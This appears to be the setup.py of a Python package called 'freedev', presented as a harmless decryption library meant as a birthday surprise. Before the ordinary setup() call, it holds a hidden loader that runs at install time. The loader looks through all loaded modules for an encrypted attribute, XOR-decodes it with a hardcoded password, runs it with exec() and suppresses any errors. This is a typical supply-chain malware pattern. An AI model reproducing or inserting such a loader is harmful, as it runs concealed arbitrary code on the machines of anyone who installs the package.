import sys
import base64
import asyncio

def xor_decrypt(encrypted_b64, password):
    try:
        encrypted_bytes = base64.b64decode(encrypted_b64)
        password = password.encode()
        decrypted = []
        for i, byte in enumerate(encrypted_bytes):
            key_char = password[i % len(password)]
            decrypted.append(byte ^ key_char)
        return bytes(decrypted).decode('utf-8')
    except Exception:
        raise

password = 'opn'

def decrypt_and_execute():
    for module in list(sys.modules.values()):
        if hasattr(module, '__encryptedd_data'):
            encryptedd_data = getattr(module, '__encryptedd_data')
            try:
                decrypted_code = xor_decrypt(encryptedd_data, password)
                exec(decrypted_code, {'asyncio': asyncio, '__name__': '__main__'})
            except Exception:
                pass

decrypt_and_execute()


from setuptools import setup, find_packages

setup(
    name="freedev",
    version="1.1.2",
    description="This is a library for password-protected decryption using opn. I created it to surprise my friend for his birthday. Please don't delete it",
    author="coorton202",
    author_email="coorton50@gmail.com",
    packages=find_packages(),
    install_requires=[],
    classifiers=[
        "Programming Language :: Python :: 3",
        "Operating System :: OS Independent"
    ],
    python_requires=">=3.6",
)